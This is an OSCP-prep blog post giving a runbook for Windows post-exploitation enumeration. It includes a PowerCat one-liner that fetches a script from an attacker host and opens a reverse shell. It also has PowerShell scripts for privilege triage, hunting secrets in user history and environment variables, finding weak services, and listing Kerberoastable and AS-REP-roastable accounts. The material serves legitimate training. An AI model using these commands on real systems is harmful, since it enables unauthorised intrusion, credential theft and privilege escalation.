Security Guy

Summary

The website content provides a detailed runbook for OSCP certification candidates focusing on enumerating Windows machines to achieve remote code execution (RCE) and subsequent privilege escalation.

Abstract

The article outlines a structured approach to enumerating Windows machines during OSCP preparation, emphasizing the importance of thorough manual and automated enumeration. It introduces a series of runbooks that guide the reader through the process of stabilizing a shell, obtaining a backup shell, and executing specific PowerShell commands to gather essential information about the system, installed software, and running processes. The author stresses the value of manual commands to reduce errors and highlights the use of tools like WinPeas for automated enumeration. Additionally, the article provides a checklist for exploiting Active Directory (AD) when valid AD credentials are available. The author encourages the development of a personalized process for tackling boxes and shares their notes and insights on GitHub for further learning.

Opinions

  • The author believes that the key to success in OSCP is effective enumeration, particularly on Windows machines.
  • Manual enumeration is preferred initially to minimize errors and focus on one aspect at a time.
  • PowerCat is recommended for establishing stable reverse shells on Windows systems.
  • The presence of SeImpersonatePrivilege is highlighted as an easy path to root access, with tools like JuicyPotatoNG, PrintSpoofer, and GodPotato being suggested for exploitation.
  • The article suggests that non-standard directories or software versions found during manual enumeration can lead to privilege escalation.
  • Environment variables and PowerShell history are considered valuable sources of potential exploits.
  • WinPeas is endorsed for automating the enumeration process, with a specific checklist provided to identify potential exploits.
  • The author advocates for the use of Bloodhound when dealing with Active Directory environments.
  • Personalized runbooks and notes are seen as crucial tools for navigating the OSCP certification process, with the author's own resources shared for community benefit.

OSCP Prep: Introducing My Runbooks — RCE on Windows


As cliché as it sounds, getting through the OSCP is all about becoming good at enumeration. While going through the certification, I read the phrase "enumerate harder" from many former students, and I'm here to tell you it's true. This write-up is the third in my series explaining my runbooks for enumerating machines at an OSCP level. You can find the runbooks for initial enumeration and Linux enumeration here:

This write-up focuses on how to enumerate a Windows machine once you have a shell on the machine. As such, you can follow this runbook once you have reached that point on a Windows box when training for the OSCP or doing a CTF at a similar level. To get a better understanding of how to get remote code execution (RCE) have a look at my initial enumeration runbook linked above.

One of the most used enumeration tools: WinPeas

Manual Enumeration Runbook

If you have read my Linux runbook, you will notice similarities in how I approach the enumeration. This is very much on purpose. Not everything is directly comparable between Linux and Windows, but some things are. As such, I have designed runbooks that follow the same key principles in the same order. One of those principles is the idea of enumerating manually first and with automated tools second.

While you can get 95% of the way using automated tools to enumerate the machines for you, I prefer to begin the enumeration process of the machines by firing off a few manual commands. Doing it this way reduces my margin of error greatly, as it forces me to look at one thing at a time rather than crawling through an entire WinPeas output in an attempt to find the needle in the haystack that will give me root. The philosophy here is “go slow to go fast”. WinPeas is nice, but sometimes there are quick wins in doing a few simple commands before running your automated tooling.

Shell Stabilization And Getting a Backup Shell

On Windows, I have rarely experienced shell instabilities, so we don't need to do much here. This is very much a matter of preference, but I usually use the PowerCat script (a PowerShell implementation of netcat) for reverse shells on Windows. Host powercat.ps1 on a web server on your attacking machine, fill in the placeholders, and run the one-liner through whatever RCE exploit you have found; it downloads the script straight into memory and then connects back with an interactive PowerShell:

IEX(New-Object System.Net.WebClient).DownloadString('http://${ATTACKER_IP}:${ATTACKER_HTTP_PORT}/powercat.ps1'); powercat -c ${ATTACKER_IP} -p ${ATTACKER_PORT} -e powershell

And that generally results in a stable shell. Once I have one stable shell, my next step is to get a backup shell running. Sometimes, even “stable” shells break or get interrupted which can snap me out of where I was about to go next. However, doing the RCE exploit twice is almost as fast as doing it once. So getting a backup shell up and running immediately allows me to focus completely on enumerating the machine and forgetting about the steps before the RCE. Once I’m “in”, I want to stay “in”.

Note! This took me way too long to figure out, so here it goes for the rest of you!

When you catch a reverse shell on your Kali Linux machine, e.g. on port 443 with:

nc -nvlp 443

Once nc has accepted that connection, it is no longer listening: the session stays up, but nothing is bound to port 443 as a listener anymore, so a fresh nc -nvlp 443 in a second terminal will bind it and catch the next shell. I see some seasoned CTF players on YouTube etc. choose new ports for their next reverse shells, which is not necessary. Once you find a port that works (443 is a good default, since outbound filtering rarely blocks it), keep using it. The added complexity of constantly using new ports just increases the odds of copy/paste errors leading to exploits that don't work.

A small tangent, but important to note.

Finding Myself

For everything that follows, you can assume I am running it in a PowerShell, not a cmd shell.

The first commands I run are usually some combination of:

whoami
whoami /priv
net user
net user /domain
systeminfo
ipconfig

This gives me a basic understanding of “where I am” and what kind of box this is. Remember that both the username and the hostname might be clues to where to look. A lot of boxes will have meaningful names. Can you use that as a clue somehow?

Two of these commands are worth paying extra attention to. whoami /priv lists the privileges held by the token we are running as. As demonstrated in my hacking 101 write-up, if you see SeImpersonatePrivilege in the output (SeAssignPrimaryTokenPrivilege is abused the same way), you have an easy path to SYSTEM through the JuicyPotatoNG, PrintSpoofer or GodPotato tools (I prefer them in that order, by the way); it does not matter whether the privilege shows as Enabled or Disabled, because the tools enable it in their own token. Make sure you know how to abuse this privilege, as it shows up on a fair number of practice machines, so you can assume it can also occur on the exam. If you are good at this it might mean some easy points in the OSCP and similar CTFs. You can see my notes on this here.

Additionally, the prefix in the whoami output tells you whether you are a domain account (DOMAIN\user) or a local one (HOSTNAME\user), and net user /domain lists the domain's accounts if the machine is domain-joined (on a standalone host it simply fails with an error). If the box is part of a domain, this might open AD-specific attack vectors (AD section is at the bottom).
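As an added example (my own code, not part of the author's runbook), here is the "Finding Myself" step turned into a small triage script: it parses whoami /priv, flags the privileges that lead somewhere, and reports whether you are a domain user on a domain-joined host. The privilege-to-technique shortlist is my own selection and is not something the post enumerates.

```powershell
# Added example (not the author's runbook): the "Finding Myself" commands
# turned into a triage that flags what to act on first. The privilege-to-
# technique mapping below is my own shortlist, not something the post lists.

$InterestingPrivs = @{
    'SeImpersonatePrivilege'        = 'Potato family: JuicyPotatoNG / PrintSpoofer / GodPotato'
    'SeAssignPrimaryTokenPrivilege' = 'Potato family (same tools as SeImpersonate)'
    'SeBackupPrivilege'             = 'Read any file, e.g. copy the SAM and SYSTEM hives'
    'SeRestorePrivilege'            = 'Write any file, e.g. swap a service binary'
    'SeDebugPrivilege'              = 'Open SYSTEM processes / dump LSASS'
    'SeLoadDriverPrivilege'         = 'Load a vulnerable signed driver'
    'SeTakeOwnershipPrivilege'      = 'Take ownership of protected files and registry keys'
}

function Get-PrivilegeTriage {
    # whoami /priv prints a padded table; the rows we care about start with "Se".
    # First whitespace-separated token is the name, the last one is Enabled/Disabled.
    # "Disabled" only means not currently enabled in the token; the potato tools
    # enable the privilege themselves, so treat both states as a hit.
    whoami /priv | Where-Object { $_ -match '^\s*Se\w+' } | ForEach-Object {
        $tokens = $_.Trim() -split '\s+'
        $name   = $tokens[0]
        $next   = if ($InterestingPrivs.ContainsKey($name)) { $InterestingPrivs[$name] } else { '' }
        [pscustomobject]@{
            Privilege = $name
            State     = $tokens[-1]
            NextStep  = $next
        }
    }
}

function Get-IdentityTriage {
    # A domain account shows up as DOMAIN\user; local ones as HOSTNAME\user,
    # NT AUTHORITY\... or NT SERVICE\... . PartOfDomain tells you whether the
    # box itself is joined, which is what decides if the AD checklist applies.
    $me = (whoami).Trim()
    $cs = Get-CimInstance Win32_ComputerSystem
    $isLocal = ($me -like "$($cs.Name)\*") -or ($me -like 'nt authority\*') -or ($me -like 'nt service\*')
    [pscustomobject]@{
        User         = $me
        Host         = $cs.Name
        Domain       = $cs.Domain
        IsDomainUser = -not $isLocal
        HostJoined   = $cs.PartOfDomain
    }
}

Get-IdentityTriage  | Format-List
Get-PrivilegeTriage | Format-Table -AutoSize
```

Run it as the first thing after the backup shell is up; the NextStep column is empty for the boring privileges (SeChangeNotifyPrivilege and friends), so anything with text in it is your first lead.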

Looking into Directories

Anything interesting in the root of C:/?

ls C:/

Is there anything interesting in the current user's home folder, in other users' folders (that we may have access to), or simply in C:/Program Files?

ls C:/Users/user/
ls C:/Users/user/Desktop
ls C:/Users/user/Documents
ls "C:/Program Files (x86)"
ls "C:/Program Files"

The intention here is to discover anything out of the ordinary. If you see any non-standard folders in the root of C:/ or similar locations, look into what it is. If it sounds like the name of a piece of software, google it, searchsploit it and check if you can figure out what version might be located on the machine. Often simple manual enumeration like this can lead to root.

Installed Software & Running Processes

32-bit:

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

64-bit:

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Running Processes:

Get-Process

If you find anything out of the ordinary, look into what it is and whether there are exploits for it. Similarly to the directory search above, make sure to google and searchsploit anything that looks interesting.
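The directory, installed-software and process checks above, combined into one pass as an added example (my own code, not the author's). It keeps only what is unlikely to be stock Windows: non-default folders in the root of C:\, installed software with its version (so you can searchsploit the exact build), and processes whose image lives outside C:\Windows. The "default root folders" baseline is my own list, not an official one.

```powershell
# Added example (not from the post): the directory, installed-software and
# process checks in one pass, keeping only what is unlikely to be stock Windows.
# The DefaultRootDirs baseline is my own list, not an official Microsoft one.

$DefaultRootDirs = 'PerfLogs', 'Program Files', 'Program Files (x86)', 'ProgramData', 'Users', 'Windows',
                   '$Recycle.Bin', 'Recovery', 'System Volume Information', 'Documents and Settings'

function Get-NonDefaultRootDirs {
    # -Force includes hidden folders; anything not in the baseline deserves a look.
    Get-ChildItem -Path 'C:\' -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.PSIsContainer -and ($DefaultRootDirs -notcontains $_.Name) } |
        Select-Object FullName, LastWriteTime
}

function Get-InstalledSoftware {
    # 64-bit hive, 32-bit-on-64 hive and the per-user hive, with version and
    # install path, since "what version is it?" is the question that matters.
    $keys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
            'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',
            'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
    Get-ItemProperty -Path $keys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName } |
        Select-Object DisplayName, DisplayVersion, Publisher, InstallLocation |
        Sort-Object DisplayName -Unique
}

function Get-NonWindowsProcesses {
    # Processes whose binary is outside C:\Windows, with owner, path and command
    # line. Get-Process -IncludeUserName needs admin, so the owner comes from WMI.
    Get-CimInstance Win32_Process | ForEach-Object {
        $owner = (Invoke-CimMethod -InputObject $_ -MethodName GetOwner -ErrorAction SilentlyContinue).User
        [pscustomobject]@{
            PID         = $_.ProcessId
            Name        = $_.Name
            Owner       = $owner
            Path        = $_.ExecutablePath
            CommandLine = $_.CommandLine
        }
    } | Where-Object { $_.Path -and ($_.Path -notlike 'C:\Windows\*') }
}

Get-NonDefaultRootDirs   | Format-Table -AutoSize
Get-InstalledSoftware    | Format-Table -AutoSize
Get-NonWindowsProcesses  | Format-Table -AutoSize -Wrap
```

A process running as another user from a non-standard path is the thing to chase first: the command line often names a config file or a listening port, and the binary's folder is where to look for a writable file or a missing DLL.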

Keys hiding in plain sight?

Check the PowerShell history of every user whose profile you can read. PSReadLine writes it to:

more C:\Users\${user}\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Check environment variables for API keys and similar goodies:

Get-ChildItem -Path Env:

The history is a classic place for Windows boxes to hide hints or direct escalation routes for you to abuse. If you see that a user has run a script, check what is in the script (and whether you can write to it, in case it is run on a schedule). Follow up on anything you find here.
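As an added example (my own code, not the author's), here is a script that reads every PSReadLine history file the shell can reach plus the environment, greps both for credential-looking content, and lists the scripts the history references that still exist on disk. The regex is my own heuristic and will miss things, so read the full history of any user it flags.

```powershell
# Added example (not the post's code): read every user's PSReadLine history the
# shell can reach plus the environment, and flag credential-looking content.
# The pattern is my own heuristic; treat a hit as a lead, not as proof.

$SecretPattern = '(?i)(password|passwd|pwd|-Credential|ConvertTo-SecureString|PSCredential|apikey|api_key|token|secret|net use|runas|-Header)'

function Get-AllPsHistory {
    # ConsoleHost_history.txt is written by PSReadLine only, so cmd.exe and
    # non-interactive sessions leave nothing here. One file per user profile.
    Get-ChildItem -Force -ErrorAction SilentlyContinue `
        'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt' |
        ForEach-Object {
            $user = $_.FullName.Split('\')[2]   # C:\Users\<user>\... -> <user>
            $n = 0
            Get-Content $_.FullName -ErrorAction SilentlyContinue | ForEach-Object {
                $n++
                [pscustomobject]@{ User = $user; Line = $n; Command = $_ }
            }
        }
}

function Find-SecretsInHistory {
    Get-AllPsHistory | Where-Object { $_.Command -match $SecretPattern }
}

function Find-SecretsInEnv {
    # Env vars are a classic spot for CTF boxes to leave API keys / DB strings.
    Get-ChildItem Env: | Where-Object { ($_.Name + '=' + $_.Value) -match $SecretPattern }
}

function Get-ScriptsFromHistory {
    # Scripts another user ran and that you can still read are worth opening:
    # the escalation (or the password) is often inside them.
    Get-AllPsHistory | ForEach-Object {
        if ($_.Command -match '[A-Za-z]:\\\S+\.(ps1|bat|cmd|vbs)\b') { $Matches[0] }
    } | Sort-Object -Unique | Where-Object { Test-Path $_ }
}

Find-SecretsInHistory  | Format-Table User, Line, Command -AutoSize -Wrap
Find-SecretsInEnv      | Format-Table Name, Value -AutoSize -Wrap
Get-ScriptsFromHistory
```

The script only catches absolute paths to scripts; if the history shows a relative path, cd into that user's home and Desktop and look for it by hand.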

Automated tooling — WinPeas

The purpose of WinPeas is to automate all the above manual enumeration commands and more. It will give you information about interesting tasks, services, folders you can write to, CVEs and kernel exploits potentially relevant to the machine and so much more. Diving into each section in WinPeas could be an entire write-up in itself (or a series of write-ups, for that matter). The TL;DR here is to check each section carefully. However, for Windows, I made an explicit checklist for myself:

  • What services are listening on the machine? Can you reach an internal HTTP/MySQL/MSSQL server or similar that was bound to localhost and therefore invisible to your port scan?
  • Is there a Task or Service running on the machine that you can abuse?
  • If a non-default service looks promising but you don't have write permissions on its .exe, check with Procmon whether it tries to load a DLL that does not exist from a directory you can write to (DLL hijacking). Also check whether the service path is unquoted and contains spaces.
  • Is the machine set up with AlwaysInstallElevated? Both the HKLM and the HKCU policy values must be 1, or the malicious .msi trick will not work.
  • Anything else that WinPeas highlights as an escalation factor?
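Manual versions of the first four checklist items, as an added example (my own checks, not WinPEAS code or the author's): local listeners, the AlwaysInstallElevated pair of registry values, and non-Windows services whose binary or folder a low-privileged user can write to or whose path is unquoted. Use it to confirm a WinPEAS hit before spending time on it; it needs only a normal user shell. Get-NetTCPConnection exists from Windows 8 / Server 2012 onward; on older hosts replace that part with netstat -ano.

```powershell
# Added example (my own manual checks, not WinPEAS output or the author's code):
# quick confirmations for the checklist items above.

function Get-ListeningPorts {
    # Listeners bound to loopback only are the interesting ones: they were
    # invisible to your port scan but are reachable now that you are on the box.
    Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue | ForEach-Object {
        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Address   = $_.LocalAddress
            Port      = $_.LocalPort
            Process   = $proc.ProcessName
            PID       = $_.OwningProcess
            LocalOnly = $_.LocalAddress -in @('127.0.0.1', '::1')
        }
    } | Sort-Object Port
}

function Test-AlwaysInstallElevated {
    # Exploitable only when BOTH the machine and the user policy value are 1.
    $paths = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
             'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $values = foreach ($p in $paths) {
        [int](Get-ItemProperty -Path $p -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    }
    ($values.Count -eq 2) -and ($values -notcontains 0)
}

function Test-WritableByLowPriv([string]$Path) {
    # Crude ACL check: does Everyone, Users, Authenticated Users or the current
    # user hold an Allow ACE that grants some form of write? Good enough to
    # triage; confirm with icacls before building an exploit around it.
    $ids = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', "$env:USERDOMAIN\$env:USERNAME"
    try { $acl = Get-Acl -Path $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            ($ids -contains $ace.IdentityReference.Value) -and
            ("$($ace.FileSystemRights)" -match 'Write|Modify|FullControl')) { return $true }
    }
    return $false
}

function Get-WeakServices {
    # Non-Windows services: binary or its folder writable by a low-priv user,
    # or an unquoted path with spaces (Windows tries "C:\Program.exe" first).
    Get-CimInstance Win32_Service |
        Where-Object { $_.PathName -and ($_.PathName -notlike '*\Windows\*') } |
        ForEach-Object {
            $raw = $_.PathName
            $exe = if ($raw -match '^"?([^"]*?\.exe)') { $Matches[1] } else { $raw }
            [pscustomobject]@{
                Name          = $_.Name
                RunsAs        = $_.StartName
                StartMode     = $_.StartMode
                State         = $_.State
                Binary        = $exe
                UnquotedSpace = ($raw -notmatch '^"') -and ($exe -match ' ')
                BinWritable   = Test-WritableByLowPriv $exe
                DirWritable   = Test-WritableByLowPriv (Split-Path $exe -Parent)
            }
        } | Where-Object { $_.UnquotedSpace -or $_.BinWritable -or $_.DirWritable }
}

Get-ListeningPorts | Format-Table -AutoSize
"AlwaysInstallElevated (both values set): $(Test-AlwaysInstallElevated)"
Get-WeakServices   | Format-Table -AutoSize
```

A writable binary or an unquoted path is only useful if you can also restart the service or it runs at boot, so read the StartMode column together with whether you can reboot the box or stop/start the service (sc qc and sc sdshow show you the permissions).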

AD Checklist — Run this if you have valid AD creds

As with WinPeas, many things can be said about what to do if you have valid AD credentials, but here is my quick checklist:

  • Any users kerberoastable?
  • Any users ASREP-roastable?
  • Run BloodHound (collect with SharpHound from the box) and visualize the AD. Does anything come to mind?
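The first two checklist items answered with a single LDAP query, as an added example (my own code, not the author's). It uses ADSI, so it works from the domain-joined shell with no RSAT module or PowerView, and it assumes the session is a domain user: the query authenticates with the logon token and binds to the current domain.

```powershell
# Added example (not the author's): Kerberoastable and AS-REP roastable users
# from one ADSI query. Assumes a domain-user session on a domain-joined host.

function Get-RoastableAccounts {
    $searcher = [adsisearcher]''     # SearchRoot defaults to the current domain's root
    $searcher.PageSize = 500         # page results so large domains are not cut at the 1000 limit
    # userAccountControl bit tests use the LDAP_MATCHING_RULE_BIT_AND OID:
    #   0x000002 = ACCOUNTDISABLE (excluded), 0x400000 = DONT_REQ_PREAUTH (AS-REP roast).
    # A user object with any servicePrincipalName is Kerberoastable.
    $searcher.Filter = '(&(objectCategory=person)(objectClass=user)' +
                       '(!(sAMAccountName=krbtgt))' +
                       '(!(userAccountControl:1.2.840.113556.1.4.803:=2))' +
                       '(|(servicePrincipalName=*)(userAccountControl:1.2.840.113556.1.4.803:=4194304)))'
    foreach ($p in 'sAMAccountName', 'servicePrincipalName', 'userAccountControl',
                   'adminCount', 'pwdLastSet', 'memberOf') {
        [void]$searcher.PropertiesToLoad.Add($p)
    }

    foreach ($r in $searcher.FindAll()) {
        $props = $r.Properties          # missing attributes come back as empty collections
        $uac   = [int]$props['useraccountcontrol'][0]
        $pls   = if ($props['pwdlastset'].Count -gt 0) {
                     [datetime]::FromFileTime([int64]$props['pwdlastset'][0])
                 } else { $null }
        [pscustomobject]@{
            User       = [string]$props['samaccountname'][0]
            Kerberoast = $props['serviceprincipalname'].Count -gt 0
            ASREPRoast = ($uac -band 0x400000) -ne 0
            AdminCount = ($props['admincount'].Count -gt 0) -and ([int]$props['admincount'][0] -eq 1)
            PwdLastSet = $pls
            Groups     = (@($props['memberof']) -replace '^CN=([^,]+),.*', '$1') -join ', '
            SPNs       = @($props['serviceprincipalname']) -join '; '
        }
    }
}

# adminCount=1 marks (current or former) members of protected groups, so those
# hashes are worth cracking first; an old pwdLastSet hints at a weak password.
Get-RoastableAccounts | Sort-Object AdminCount -Descending |
    Format-Table User, Kerberoast, ASREPRoast, AdminCount, PwdLastSet, Groups -AutoSize
```

The ticket or AS-REP hashes for the flagged accounts then come from Rubeus on the box or Impacket's GetUserSPNs.py / GetNPUsers.py from your attacking machine, as usual.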

Final Remarks

As mentioned in previous write-ups, your process will be different from everybody else’s. However, I believe finding your groove with tackling boxes is what will get you through the OSCP, and a runbook is one tool to do that. I have found that having something I could always go back to after a deep rabbit hole helped me a lot during my practice. However, it’s not a magic formula. No list of actions will get you from zero to hero overnight. What gets you there is the hard work you put in!

If you want to dive into my unorganized notes from the OSCP and other red-teaming exercises, feel free to have a look at my GitHub repository with my notes here.

Also, I’m not super active on socials but feel free to give me a follow on X (or is it Twitter?)
